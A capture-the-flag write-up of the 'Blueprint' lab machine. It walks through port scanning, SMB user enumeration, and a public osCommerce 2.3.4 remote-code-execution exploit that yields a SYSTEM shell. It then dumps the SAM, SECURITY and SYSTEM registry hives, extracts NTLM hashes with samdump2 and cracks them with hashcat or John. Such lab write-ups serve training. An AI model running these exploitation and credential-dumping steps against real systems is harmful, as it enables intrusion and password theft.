Blueprint
The Blueprint machine presented several vulnerabilities:
- Open Network Ports and Services: Numerous open ports were identified, including common services like SMB, HTTP, HTTPS, and MySQL. The presence of these services, particularly SMB, indicated potential attack vectors.
- SMB Enumeration: Successful SMB enumeration revealed user accounts, suggesting weak access controls or default configurations.
- Vulnerable Web Application (osCommerce 2.3.4): A publicly disclosed Remote Code Execution (RCE) vulnerability in the osCommerce 2.3.4 application allowed for arbitrary code execution as the
nt authority\systemuser. - Weak NTLM Hash: The NTLM hash for the "Lab" user was obtained and successfully cracked, revealing a weak password.
These vulnerabilities, when chained together, allowed for a complete system compromise.
Reconnaissance and Scanning
export TARGET_IP=10.10.151.2
nmap -p- --min-rate 5000 $TARGET_IP
Output:
Not shown: 61044 closed tcp ports (reset), 4478 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
8080/tcp open http-proxy
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
- 139/tcp (NetBIOS) and 445/tcp (SMB): Windows file sharing services, often vulnerable to misconfigurations and exploits.
SMB Enumeration
Given the presence of SMB, further enumeration was performed using nbtscan and nmap's SMB scripts.
NetBIOS Name Resolution (nbtscan)
nbtscan was used to resolve NetBIOS names and identify the target's hostname and workgroup.
nbtscan -v -r $TARGET_IP
Output:
NetBIOS Name Table for Host 10.10.151.2:
Incomplete packet, 209 bytes long.
Name Service Type
----------------------------------------
BLUEPRINT <00> UNIQUE
WORKGROUP <00> GROUP
BLUEPRINT <20> UNIQUE
WORKGROUP <1e> GROUP
WORKGROUP <1d> UNIQUE
__MSBROWSE__ <01> GROUP
Adapter address: 02:09:5a:5c:5a:45
----------------------------------------
Analysis:
This confirmed the hostname as "BLUEPRINT" and the workgroup as "WORKGROUP".
SMB User Enumeration (nmap)
The smb-enum-users script in nmap was used to attempt to list user accounts on the target system.
nmap -p445 --script smb-enum-users $TARGET_IP
Output:
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-users:
| BLUEPRINT\Administrator (RID: 500)
| Description: Built-in account for administering the computer/domain
| Flags: Password does not expire, Normal user account
| BLUEPRINT\Guest (RID: 501)
| Description: Built-in account for guest access to the computer/domain
| Flags: Password not required, Password does not expire, Normal user account
| BLUEPRINT\Lab (RID: 1000)
| Full name: Steve
|_ Flags: Normal user account
Analysis:
This revealed three user accounts: Administrator, Guest, and Lab. The presence of these accounts, especially the Administrator account, indicated a potential target for privilege escalation. The fact that Guest does not require a password indicates a significant misconfiguration.
Web Application Exploitation (osCommerce)
Browsing to http://$TARGET_IP:8080 revealed a directory named oscommerce-2.3.4. This suggested the presence of the osCommerce e-commerce platform.
Vulnerability Identification (searchsploit)
searchsploit was used to search for known vulnerabilities in osCommerce version 2.3.4.
searchsploit oscommerce-2.3.4
Output:
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
osCommerce 2.3.4 - Multiple Vulnerabilities | php/webapps/34582.txt
osCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Injection | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injection | php/webapps/46330.txt
osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting | php/webapps/49103.txt
osCommerce 2.3.4.1 - Arbitrary File Upload | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py
osCommerce 2.3.4.1 - Remote Code Execution (2) | php/webapps/50128.py
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Analysis:
Multiple vulnerabilities were identified, including several Remote Code Execution (RCE) exploits. The exploit at /php/webapps/50128.py was chosen.
Exploitation (RCE)
The chosen RCE exploit was executed using Python. This exploit leverages a vulnerability in the osCommerce application to upload and execute a malicious PHP file.
python3 /usr/share/exploitdb/exploits/php/webapps/50128.py http://10.10.151.2:8080/oscommerce-2.3.4/catalog/
Analysis:
The exploit successfully established a reverse shell, granting nt authority\system privileges. This is the highest level of privilege on a Windows system.
Root Flag Retrieval:
RCE_SHELL$ whoami # nt authority\system
RCE_SHELL$ dir C:\Users
RCE_SHELL$ type C:\Users\Administrator\Desktop\root.txt.txt
Post-Exploitation and NTLM Hash Extraction
After gaining system-level access, the next step was to retrieve the NTLM hash of the Lab user. This involved dumping the Security Account Manager (SAM) database, which stores user password hashes.
Registry Dumping
The reg.exe utility was used to save the relevant registry hives (SAM, SECURITY, and SYSTEM) to files. These hives contain the necessary information to extract the NTLM hashes.
reg.exe save hklm\sam SAM
reg.exe save hklm\security Security
reg.exe save hklm\system SYSTEM
File Transfer
http://10.10.151.2:8080/oscommerce-2.3.4/catalog/install/includes/SAM
http://10.10.151.2:8080/oscommerce-2.3.4/catalog/install/includes/Security
http://10.10.151.2:8080/oscommerce-2.3.4/catalog/install/includes/SYSTEM
These files can be downloaded via a web browser or a tool like wget.
Hash Extraction (samdump2)
samdump2 was used to extract the NTLM hashes from the downloaded registry hives.
samdump2 SYSTEM SAM
Output:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
Explanation:
- The output is in the format:
username:RID:LMhash:NTLMhash:::. - The NTLM hash is the second hash after the RID.
NTLM Hash Cracking
The NTLM hash for the Lab user (30e87bf999828446a1c1209ddde4c450) was then cracked. While I used ntlm.pw, a more robust and professional approach would involve using a dedicated password cracking tool like hashcat or John the Ripper.
Example using hashcat:
hashcat -m 1000 30e87bf999828446a1c1209ddde4c450 /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
Or, using John the Ripper:
echo "Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::" > hash.txt
john --wordlist=/usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000000.txt --format=NT hash.txt